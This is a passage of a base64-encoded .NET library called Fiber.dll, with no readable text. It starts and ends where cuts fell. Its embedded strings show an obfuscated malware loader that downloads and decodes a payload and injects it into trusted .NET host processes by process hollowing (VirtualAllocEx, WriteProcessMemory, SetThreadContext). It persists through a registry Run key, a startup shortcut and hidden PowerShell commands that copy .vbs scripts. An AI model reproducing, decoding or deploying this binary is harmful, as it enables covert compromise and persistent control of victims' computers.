w0/A8kBmg0JAdEBzg1SA9kB4ARjA+EBDQ6IAkkAPA5oA+EBVg7tAukBdw5vA9kBpg50A9EBxQ6GA+EBVg7PAuEB9Q6IAuEBFQ+IAtEBOg+iA/EBXw+eAUkAWBIIBAkCUAA3AGEBUABQACkBUAA3APkBgxI3BAkCsBJABBEC7BI3AEkAPA5FBPEBbBNLBEkAhxNvAxkCyhNRBPkB5hNYBBkCCRRiBCkCLBRyBBkCUBSEBEkBgRSKBEkBpBQ3ADkCUACzBEECUADCBFECUAA3AFkCUAA3AGECUAA3AGkCUABQAHECUAA3AHkCUAA3AIECUAA3AIkCUAAjBikAcwPOBC4AWwBaAC4AUwBKAC4ASwBKAC4ACwABAC4AawCRAC4AYwCEAC4AQwBKAC4AIwBKAC4AGwA7AC4AEwAYAC4AOwBKAC4AMwBKAC4AKwBKAEkAcwPfBGAAUwO5BGAAWwPJBGMAUwO5BGMASwOaBGkAcwPzBIMASwOaBIMAUwO5BIkAcwMABaMAawPJBKMASwOaBKMAYwPJBMAAWwPJBMMAUwO5BMMAkwPBBckAUwM7AOAAWwPJBOMAUwO5BOMAUwBKAOkAUwM7AAABWwPJBAMBSwMUBQMBawPJBAMBYwPJBAMBgwPJBAMBewPJBCABWwPJBCMBgwPJBCMBUwM7ACMBSwNWBSkBcwOwBUMBYwPJBEMBawPJBEMBgwPJBEMBewPJBIABUwO5BIABWwPJBKABWwPJBKABUwO5BMABUwO5BMABWwPJBOABUwO5BOABWwPJBAACWwPJBCACWwPJBEACWwPJBEACUwO5BGADWwPJBIADWwPJBIADUwO5BCAMiwPJBEAMiwPJBGAMiwPJBIAMiwPJBKAMiwPJBMAMiwPJBOAMiwPJBAANiwPJBCANiwPJBEANiwPJBAEAAAAAAA0AAQAAAAAADgANAXgBsgEfAv0DEwQFAAEABwAFAAgABgAJAAgACgAJAAAAqQJKAQAApgRPAQAAEARUAQAAsgRZAQAAlQbTAQAA0QbyAQAAowf3AQAALQgPAgAAVQgPAgIABgADAAIABwAFAAIACAAHAAIACQAJAAIAGwALAAIAHwANAAEAIQAPAAIAIAAPAAIAKAARAAIALQATAFwQ4RERARgBHwEmAX0BtwG+AcUBBAHDAE4QAQAAAcUAjRABAAABxwC4EAEAAAHJAOMQAQAAAcsADhEBAAABzQBqEQEAAAHPAKARAQAAAdEAzBECAAAB0wAhEgEAAAHVAEESAQAEgAAAAQAAAAAAAAAAAAAAAAABAAAABAAAAAAAAAAAAAAACgBHAAAAAAAKAAAAAAAAAAAAAADbAIgCAAAAAAQAAAAAAAAAAAAAAAoAWwAAAAAABAAAAAAAAAAAAAAACgDkCAAAAAAAAAAAAQAAAJMVAAAGAAUABwAFAA0ADAAOAAwAAAAQAA4A/AQAABAAIQD8BAAAAAAjAPwEMQCGATEAyAFTAFECWwBRAlMAaAIARmliZXIAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAG1zY29ybGliAC5jdG9yAFZvaWQAU3lzdGVtAEludDMyAEJvb2xlYW4AUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBTeXN0ZW0uRGlhZ25vc3RpY3MARGVidWdnaW5nTW9kZXMAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBTeXN0ZW0uUmVmbGVjdGlvbgBTdHJpbmcAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAEd1aWRBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGaWJlci5kbGwAPE1vZHVsZT4Ad2VxRE15OVVFVktWS1dIbFptAE9iamVjdABNeUFwcGxpY2F0aW9uAEZpYmVyLk15AEFwcGxpY2F0aW9uQmFzZQBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMATXlDb21wdXRlcgBDb21wdXRlcgBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBNeVByb2plY3QATXlXZWJTZXJ2aWNlcwBUaHJlYWRTYWZlT2JqZWN0UHJvdmlkZXJgMQBSZXNvdXJjZXMARmliZXIuTXkuUmVzb3VyY2VzAE15U2V0dGluZ3MAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAU3lzdGVtLkNvbmZpZ3VyYXRpb24ATXlTZXR0aW5nc1Byb3BlcnR5AEhvbWUAVG9vbHMAUFJPQ0VTU19JTkZPUk1BVElPTgBWYWx1ZVR5cGUAU1RBUlRVUF9JTkZPUk1BVElPTgBKMzEweDJDN1pxZnNmWDZsbzIAa1A2eTVFcVdFT00xY2lCTk5BAG1fQ29tcHV0ZXJPYmplY3RQcm92aWRlcgBtX0FwcE9iamVjdFByb3ZpZGVyAG1fVXNlck9iamVjdFByb3ZpZGVyAFVzZXIAbV9NeVdlYlNlcnZpY2VzT2JqZWN0UHJvdmlkZXIALmNjdG9yAGdldF9Db21wdXRlcgBnZXRfR2V0SW5zdGFuY2UAZ2V0X0FwcGxpY2F0aW9uAGdldF9Vc2VyAGdldF9XZWJTZXJ2aWNlcwBkY1FGNnZ4U0FoNk1jbzV1a0EAbmtUZnFXT3NuM0o2aWcxRVNsAEFwcGxpY2F0aW9uAFdlYlNlcnZpY2VzAEVxdWFscwBvAEdldEhhc2hDb2RlAEdldFR5cGUAVHlwZQBUb1N0cmluZwBDcmVhdGVfX0luc3RhbmNlX18AVABpbnN0YW5jZQBBY3RpdmF0b3IAQ3JlYXRlSW5zdGFuY2UARGlzcG9zZV9fSW5zdGFuY2VfXwBrSDFEd21Jcjd5TlE1MFZlRVhSAFJ1bnRpbWVIZWxwZXJzAEdldE9iamVjdFZhbHVlAFVqc05QWUlNVjRRRmFJY05Lc1UARzV2Q3JxSWJvRDBMVE45SVFrSABLOHBPMURJblRndmZyVGpCNTU5AFRsckVGc0lMeWs4Tkg1dEZNNmcAZWMyMnVhSW8xZWs1SXRNUWt1WABSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQB1MlZneUtJaXR0bzNjOVNYZkFjAEdWQ3M2a0lQVVE1U2tGNGpmSzcAbV9Db250ZXh0AENvbnRleHRWYWx1ZWAxAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAGdldF9WYWx1ZQBzZXRfVmFsdWUARzE2QXJhSTNZNnVEMUtyaXhmWQB3MmlGZmxJMmdhd3JaUlVlSTZYAEdldEluc3RhbmNlAHJlc291cmNlTWFuAHJlc291cmNlQ3VsdHVyZQBnZXRfUmVzb3VyY2VNYW5hZ2VyAFJlc291cmNlTWFuYWdlcgBTeXN0ZW0uUmVzb3VyY2VzAGdldF9Bc3NlbWJseQBBc3NlbWJseQBnZXRfQ3VsdHVyZQBDdWx0dXJlSW5mbwBTeXN0ZW0uR2xvYmFsaXphdGlvbgBzZXRfQ3VsdHVyZQBWYWx1ZQBKTktYZWltb3ZsRllNb043WTkAUmVmZXJlbmNlRXF1YWxzAEppTFVvVXQ2cVJGRDBaaUpoWABtY3BveUROeDFlTjJBTVBTN04ATm5rYXc0eUxzN0pubmJrbGRIAEN1bHR1cmUAZGVmYXVsdEluc3RhbmNlAGdldF9EZWZhdWx0AFRSSkpBNjgxSVNkVUM0OXNXSwBTZXR0aW5nc0Jhc2UAU3luY2hyb25pemVkAENLY01xOHBIckNQNUVnU2NrbgBCeTc2ckwxdVRxc2NoMVR1YVgARWhYRXFoNjg3czVkMzkwQm1zAERlZmF1bHQAZ2V0X1NldHRpbmdzAGhLeExZVzcxQzJmYkNkbWZrTgBTZXR0aW5ncwBWQUkAUUJYdFgAc3RhcnR1cABzdGFydHVwX3JlZwBSZWdpc3RyeUtleQBNaWNyb3NvZnQuV2luMzIAR3VpZABQcm9jZXNzU3RhcnRJbmZvAEV4Y2VwdGlvbgBXZWJDbGllbnQAU3lzdGVtLk5ldABFbnVtZXJhYmxlAFN5c3RlbS5MaW5xAFN5c3RlbS5Db3JlAEFueQBJRW51bWVyYWJsZWAxAFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAFByb2Nlc3MAUmVnaXN0cnkAQ3VycmVudFVzZXIAQ29udGFpbnMARGlyZWN0b3J5SW5mbwBTeXN0ZW0uSU8ARmlsZUluZm8AeVgyblNQS2ppR1FEMVkzYXMwAGp0ZlEzTUhGZWp0MndjSWkzVQBTZWN1cml0eVByb3RvY29sVHlwZQBTZXJ2aWNlUG9pbnRNYW5hZ2VyAHNldF9TZWN1cml0eVByb3RvY29sAFUyaHdFblhBcUFQREE3clVpZQBFbmNvZGluZwBTeXN0ZW0uVGV4dABnZXRfVVRGOABNUDIxUEZWOWc2NUxBZzNVeE0Ac2V0X0VuY29kaW5nAEJnbHdvOWJjOHVqSzhXZXEyMgBTdHJpbmdzAFN0clJldmVyc2UAcThuV1FPbmdKaVRzOGJubkRrAFJlcGxhY2UAclVQUzlYcjgzbnRTY0p5RkswAGdCd0ZSN01STVpIZUQyOWlmRwBEb3dubG9hZFN0cmluZwBobmowYm9MeDZ3SmNBTDdPTTEAT3BlcmF0b3JzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAENvbXBhcmVTdHJpbmcAYWdCQkxlb1BCSE1EY0c1SEEwAFNwZWNpYWxGb2xkZXIARW52aXJvbm1lbnQAR2V0Rm9sZGVyUGF0aABmdjdGeDRpb3R2eDNoVTZqZWIATmV3R3VpZABhcjhwaGhQU2JxV05SMzNVbEcAQ29uY2F0AG1pM1EwZzNRNXZzQkdEbWkzRABEaXJlY3RvcnkAR2V0RmlsZXMAT2RtYlB1MlBZTTQ0UXF4ZFlRAFByb2Nlc3NXaW5kb3dTdHlsZQBzZXRfV2luZG93U3R5bGUAZXV3MVk2WW1pQUVjOVN0am01AHNldF9GaWxlTmFtZQBZcTM5aE1CZFVsRjVGOVpoMHMAZW5NVzZjMExxMkVpQ2M5NTN3AHNldF9Bcmd1bWVudHMAWVBuSU9SVXBIUUFGZVNqU0pSAHNldF9TdGFydEluZm8AYWNROVpFRFJsbTZzanBaMVVuAFN0YXJ0AHFtTkhKMzV2ZlhORjM5TWM2cABPcGVuU3ViS2V5AHE1WEd1MnM3bkhaanFsYk5KNwBHZXRWYWx1ZU5hbWVzAHNETEtXSHVUUWNpUzlwRjc4MQBTZXRWYWx1ZQBJeExLMHU0Sm1uMzBNaGV4aDAAQ2xvc2UATWlieHJVRWtCeTVRNExyT2EzAENvbnZlcnQARnJvbUJhc2U2NFN0cmluZwBCeXRlAGtuQWpEM0ZEVTBKN3dhc2FWMwB1N25VdGh3bE9IVVhaSmdib0UAUDJHNFJSaHFKZG9ZdUU3UUtwAExUSTdpcnZqYVI2Z0pWaWxOOQBJbnRlcmFjdGlvbgBDcmVhdGVPYmplY3QAZzU5d1JLSnA3b2tTU29LTWdjAG0wbFNZbFdqeGxMRXlXY1l0TwBQcm9qZWN0RGF0YQBTZXRQcm9qZWN0RXJyb3IAY21tNTBWWml1TXlleE9nWHhOAENsZWFyUHJvamVjdEVycm9yAGs2bXVwTFJUazNqbXBTcHNJZgBOZXdMYXRlQmluZGluZwBMYXRlR2V0AE9NNWV0dWF3dkhVeWk3M2tkRgBDb252ZXJzaW9ucwBmdFl4U1BHTUJpcGNKZTVZOEsAUGF0aABHZXRGaWxlTmFtZVdpdGhvdXRFeHRlbnNpb24AcTIyT0xtY0N4NW1UbU9SN0tJAEZvcm1hdABkbEtBam56dnVpRXgwMXlFVmIAQ29tYmluZQBXbEl1OERJQXAxang0ZXVxRUgxAEZpbGUARXhpc3RzAGRab2xpM0lJSTUwdHZ3amI0QWUAakRlMTRoSVRkVnZWaVVsSWxyMABDaGFuZ2VUeXBlAHl5bGpRR0lsRE9UUkpEMmZoWkYATGF0ZVNldABJeHFWTXRJUzdudHV5SDY5WG9IAFc2RUpZU0llOE8zdllsUTlpOFEAR2V0RnVsbFBhdGgAQ2RuUzg2SWtlZWdDakdzYlZwYQBHZXREaXJlY3RvcnlOYW1lAGpiNDl1S0lDNDhYZFk2MkVrNjEATGF0ZUNhbGwAcDRqN2hsSVF1RUFPcmJIMzg4UwBNYXJzaGFsAFJlbGVhc2VDb21PYmplY3QAeTJ3YVU0ZjhWZnBiS3NhYXRYAGU1QnhhQTlTVXR5R3BtSVV2UwBDcmVhdGVQcm9jZXNzX0FQSQBhcHBsaWNhdGlvbk5hbWUAY29tbWFuZExpbmUASW50UHRyAHByb2Nlc3NBdHRyaWJ1dGVzAHRocmVhZEF0dHJpYnV0ZXMAaW5oZXJpdEhhbmRsZXMAVUludDMyAGNyZWF0aW9uRmxhZ3MAZW52aXJvbm1lbnQAY3VycmVudERpcmVjdG9yeQBzdGFydHVwSW5mbwBwcm9jZXNzSW5mb3JtYXRpb24AQ3JlYXRlUHJvY2VzcwBrZXJuZWwzMi5kbGwAR2V0VGhyZWFkQ29udGV4dF9BUEkAdGhyZWFkAGNvbnRleHQAR2V0VGhyZWFkQ29udGV4dABXb3c2NEdldFRocmVhZENvbnRleHRfQVBJAFdvdzY0R2V0VGhyZWFkQ29udGV4dABTZXRUaHJlYWRDb250ZXh0X0FQSQBTZXRUaHJlYWRDb250ZXh0AFdvdzY0U2V0VGhyZWFkQ29udGV4dF9BUEkAV293NjRTZXRUaHJlYWRDb250ZXh0AFJlYWRQcm9jZXNzTWVtb3J5X0FQSQBwcm9jZXNzAGJhc2VBZGRyZXNzAGJ1ZmZlcgBidWZmZXJTaXplAGJ5dGVzUmVhZABSZWFkUHJvY2Vzc01lbW9yeQBXcml0ZVByb2Nlc3NNZW1vcnlfQVBJAGJ5dGVzV3JpdHRlbgBXcml0ZVByb2Nlc3NNZW1vcnkATnRVbm1hcFZpZXdPZlNlY3Rpb25fQVBJAE50VW5tYXBWaWV3T2ZTZWN0aW9uAG50ZGxsLmRsbABWaXJ0dWFsQWxsb2NFeF9BUEkAaGFuZGxlAGFkZHJlc3MAbGVuZ3RoAHR5cGUAcHJvdGVjdABWaXJ0dWFsQWxsb2NFeABSZXN1bWVUaHJlYWRfQVBJAFJlc3VtZVRocmVhZABBbmRlAGRhdGEARW1wdHkAUmFuZG9tAEhhbmRsZVJ1bgBwYXRoAGNtZABjb21wYXRpYmxlAFplcm8ATWM1T1g5SXg5TEJrZXduODY4RABUQlRkU0xJT29Oa2NPdTBWZ3JsAE5leHQAc0FOSEE0SU44WmVtNTN1TFpCZABpMVNaUmtJeVM3eW5DT3VGTDZwAEZpbGVTeXN0ZW1JbmZvAFJlZnJlc2gAY0NUNlRUSW03a0pHRHBOcnJaeQBGNTNzZVVJZ3VtREJEZWNLV2NWAE1ScWduSElxc1RHZTlMeDVjTVQAd2xkZjc0SXRvdll4MW5FcGpVZwBDNkFBRU1JcEdXcDZzQUF4cmlGAHRuU0F0T0kxSkZDdXhuNUJHVkYAU2l6ZU9mAFJnaWNSVEk4cFdldmhwM2NDUXUASXNOdWxsT3JFbXB0eQBNalM5UFdJNlQ1R0RaU2lnQjV5AHpHTkFZVklqbkpFNEF1Vzd0N1cAQml0Q29udmVydGVyAFRvSW50MzIAd3gyQnMwSWRMZUdEU2FuRTVjWABnZXRfU2l6ZQBVSUF5NGpJN0g3b3JXR2h1Y1FPAEludDE2AFRvSW50MTYAbURtNFFDSWZCbXB2bFdTdUVUNABCdWZmZXIAQmxvY2tDb3B5AEFycmF5AHAyRkVHNEk5ZkJ1R2llUHdPN0sAR2V0Qnl0ZXMARXlnVFFnSUtwRmloREV4V1ExMABtbm8xeEhJSDZUS2lveWc5a3NJAEdldFByb2Nlc3NCeUlkAFdYcU9SZElYN1E4ajJiTXVLR2YAS2lsbABEczRGV1dJVkRtUThRTHJteEhxAFByb2Nlc3NIYW5kbGUAVGhyZWFkSGFuZGxlAFByb2Nlc3NJZABUaHJlYWRJZABTaXplXwBSZXNlcnZlZDEARGVza3RvcABUaXRsZQBkd1gAZHdZAGR3WFNpemUAZHdZU2l6ZQBkd1hDb3VudENoYXJzAGR3WUNvdW50Q2hhcnMAZHdGaWxsQXR0cmlidXRlAGR3RmxhZ3MAd1Nob3dXaW5kb3cAY2JSZXNlcnZlZDIAUmVzZXJ2ZWQyAFN0ZElucHV0AFN0ZE91dHB1dABTdGRFcnJvcgBGaWJlci5SZXNvdXJjZXMucmVzb3VyY2VzAEdlbmVyYXRlZENvZGVBdHRyaWJ1dGUAU3lzdGVtLkNvZGVEb20uQ29tcGlsZXIARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAFN5c3RlbS5Db21wb25lbnRNb2RlbABFZGl0b3JCcm93c2FibGVTdGF0ZQBEZWJ1Z2dlckhpZGRlbkF0dHJpYnV0ZQBTdGFuZGFyZE1vZHVsZUF0dHJpYnV0ZQBIaWRlTW9kdWxlTmFtZUF0dHJpYnV0ZQBIZWxwS2V5d29yZEF0dHJpYnV0ZQBTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduAERlYnVnZ2VyTm9uVXNlckNvZGVBdHRyaWJ1dGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAU3VwcHJlc3NVbm1hbmFnZWRDb2RlU2VjdXJpdHlBdHRyaWJ1dGUAU3lzdGVtLlNlY3VyaXR5AE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAAAfRgBpAGIAZQByAC4AUgBlAHMAbwB1AHIAYwBlAHMAAAsoAPgAKwAoACoAAANiAAANfQCRJfoAKAB9ACEAAANjAAALtiX4AP3/fQA0AAADZAAACygAwCWyJSoAHiIAA2UAABFAAEAA/f+RJUAAKwBAAMAlAAN4AAAR3SEqAEAAHyayJSgAKgCTIQADaAAAEf3/HwR9AP3/GiIeJgAm+AAAA3QAAAsoAPoAHiIoAF0AAAMxAAAR+gAqAEAAQAAoAPgA+gAoAAADMgAAEcAlKwCSIZMhfQDwAB8mtiUAAzoAABG2JToAIwAeJioAzyUqADQAAAMvAAADXAAACS4AdgBiAHMAAAsqAC4AdgBiAHMAAHNDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAcwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAAcSAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAEMAbwBwAHkALQBJAHQAZQBtACAALQBQAGEAdABoACAAKgAuAHYAYgBzACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAAW1MATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuAAAJUABhAHQAaAAAG1cAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAAAEAHVMAcABlAGMAaQBhAGwARgBvAGwAZABlAHIAcwAAD1MAdABhAHIAdAB1AHAAABt7ADAAfQBfAHsAMQA6AE4AfQAuAGwAbgBrAAAdQwByAGUAYQB0AGUAUwBoAG8AcgB0AGMAdQB0AAAZSQBjAG8AbgBMAG8AYwBhAHQAaQBvAG4AABtuAG8AdABlAHAAYQBkAC4AZQB4AGUALAAwAAAVVABhAHIAZwBlAHQAUABhAHQAaAAAI1cAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbAAACXYAMQAuADAAAB1wAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAABNBAHIAZwB1AG0AZQBuAHQAcwAAgJktAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAAewAwAH0AIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANQA7ACAAUwB0AGEAcgB0AC0AUAByA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